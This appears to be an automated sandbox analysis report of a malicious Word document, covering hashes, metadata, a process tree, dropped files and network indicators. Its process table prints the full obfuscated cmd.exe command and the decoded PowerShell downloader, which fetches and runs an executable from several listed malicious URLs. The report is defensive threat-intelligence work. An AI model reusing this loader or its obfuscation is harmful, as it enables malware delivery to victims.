Field | Value |
---|---|
File name: | FA_9016006.doc |
Full analysis: | https://app.any.run/tasks/72688bcd-17c5-43ff-9c20-9a137703ed8b |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 14:28:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 12:09:00 2019, Last Saved Time/Date: Tue Jan 15 12:09:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 5AAAAE4E611FE7731F0C798F801EF685 |
SHA1: | C57A1B3D411E1588C99E35EB33686483C2A17C0A |
SHA256: | CD4AE834983FF4189D1D0FD22E71A8B81476FE5E380FAA14D106C906F34DBBB7 |
SSDEEP: | 1536:SR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadpVA+FdQMspn9+a9Q:SR8GhDS0o9zTGOZD6EbzCdpVAiqMOI |
Ext. | Description |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 3 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 3 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:01:15 12:09:00 |
CreateDate: | 2019:01:15 12:09:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3360 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA_9016006.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2872 | "C:\Windows\system32\cmd.exe" /c %PrOgRamdATa:~0,1%%pRoGramDaTA:~9,2% /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | %tmP:~-8,-7%%appdATA:~-4,1%D " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3476 | CmD /v: /R " sET WtOF=pow^%PUBLIC:~5W31^%r^%SESSIONNAME:~-4W31^%?^% EMP:~-3W31^%llC6$onlinewnY='moderanYor]r';$In]esnYmennYA22ounnYos=new-oh`e2nYC6NenY.WehCliennY;$Ergonomi2]s='?nYnYp://www.ninYes?agri2o.2om/z7ISlnYpB@?nYnYp://www.nYenmiengiaren?anY.2om/hIf2Ri8tS2@?nYnYp://www.?opeinnYls2?ool.org/ehIV1do@?nYnYp://www.dnenes.2om.mx/Wm]9Lwru@?nYnYp://kynangnYu?o2.2om/?6p [O_'.SplinY('@');$,ro2eryAunYomonYi]eAunYomonYi]ews='ROIso';$SmallFres? unaa`C6=C6'\\4';$MoneyMarkenYA22ounnYir='plugandplaywz';$_eardIslandandM2[onaldIslandski=$en]:puhli2+'#'+$SmallFres? unaa`+'.exe';forea2?($deposinYpqC6inC6$Ergonomi2]s)JnYryJ$In]esnYmennYA22ounnYos.[ownloadFile($deposinYpqW3C6$_eardIslandandM2[onaldIslandski);$generanYing`k='ininYianYi]es?i';IfC6((,enY-InYemC6$_eardIslandandM2[onaldIslandski).lengnY?C6-geC680000)C6JIn]oke-InYemC6$_eardIslandandM2[onaldIslandski;$PersonalLoanA22ounnYrf='AunYomonYi]e]z';hreak;}}2anY2?J}}$paradigmsd2='In2redihleCon2renYetSeyhoardal';&Set rM29=!WtOF:,=G!& sET 7f=!rM29:W3=,!&&sET Gi7=!7f: =T!&& SET pNAW=!Gi7:C6= !&& SET 1OZ=!pNAW:h=b!&& sEt 8hEj=!1OZ:?=h!&& sEt 87=!8hEj:_=H!&&SeT 5zLR=!87:tS=K!& seT JKI=!5zLR:2=c!&& SeT 4OiV=!JKI:\=2!&& SeT Jg=!4OiV:J={!& SET tW=!Jg:`=j!& set wg=!tW:nY=t!& SeT lE3d=!wg:#=\!& set 94vg=!lE3d:]=v!& SEt 3fr=!94vg:[=D!&& ecHO %3fr% | cmD " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3724 | C:\Windows\system32\cmd.exe /S /D /c" ecHO %3fr% " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3812 | cmD | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2244 | powershell $onlinewt='moderatorvr';$InvestmentAccountos=new-object Net.WebClient;$Ergonomicvs='http://www.niteshagrico.com/z7ISltpB@http://www.tenmiengiarenhat.com/bIfcRi8Kc@http://www.hopeintlschool.org/ebIV1do@http://www.dnenes.com.mx/Wmv9Lwru@http://kynangtuhoc.com/h6pTDOH'.Split('@');$GroceryAutomotiveAutomotivews='ROIso';$SmallFreshTunaaj = '224';$MoneyMarketAccountir='plugandplaywz';$HeardIslandandMcDonaldIslandski=$env:public+'\'+$SmallFreshTunaaj+'.exe';foreach($depositpq in $Ergonomicvs){try{$InvestmentAccountos.DownloadFile($depositpq, $HeardIslandandMcDonaldIslandski);$generatingjk='initiativeshi';If ((Get-Item $HeardIslandandMcDonaldIslandski).length -ge 80000) {Invoke-Item $HeardIslandandMcDonaldIslandski;$PersonalLoanAccountrf='Automotivevz';break;}}catch{}}$paradigmsdc='IncredibleConcreteKeyboardal'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR85A1.tmp.cvr | — | — | — |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5CDE28A.wmf | — | — | — |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\169D8B28.wmf | — | — | — |
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\048FAGCNPJZYTATA2AYU.temp | — | — | — |
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1993ca.TMP | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_9016006.doc | pgc | 625885D3AE4973484FB02F07B55705AF | A2017C0F887B9603F897917E5467C3A64C8C6BC7D93ABD0B01E78FA5A8089045 |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | BCA7725C8CB9C8D63EC166E879124B21 | 05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | E20DA999982389B296171208E9568D51 | 81F8DC32D3490E07DEE46D8CF137753CC7EA4A8D62A018F0BF6674100C571B3A |
3360 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3317D03.wmf | wmf | 617590F0686262333195DBA8071059B3 | 6C4F26D27658913C253054AB21319C899D3DFF14EB0FC5CD1611CBC2FED359F3 |
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 901ECDF767744E6BB59CB023757886E3 | 48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | powershell.exe | GET | — | 103.28.38.93:80 | http://www.tenmiengiarenhat.com/bIfcRi8Kc | VN | — | — | malicious |
2244 | powershell.exe | GET | — | 103.28.38.93:80 | http://www.tenmiengiarenhat.com/bIfcRi8Kc | VN | — | — | malicious |
2244 | powershell.exe | GET | — | 111.198.158.123:80 | http://www.hopeintlschool.org/ebIV1do | CN | — | — | malicious |
2244 | powershell.exe | GET | 404 | 108.167.146.99:80 | http://www.niteshagrico.com/z7ISltpB | US | html | 8.05 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2244 | powershell.exe | 103.28.38.93:80 | www.tenmiengiarenhat.com | NhanHoa Software company | VN | malicious |
2244 | powershell.exe | 108.167.146.99:80 | www.niteshagrico.com | CyrusOne LLC | US | malicious |
2244 | powershell.exe | 111.198.158.123:80 | www.hopeintlschool.org | China Unicom Beijing Province Network | CN | malicious |
Domain | IP | Reputation |
---|---|---|
www.niteshagrico.com | 108.167.146.99 | malicious |
www.tenmiengiarenhat.com | 103.28.38.93 | malicious |
www.hopeintlschool.org | 111.198.158.123 | malicious |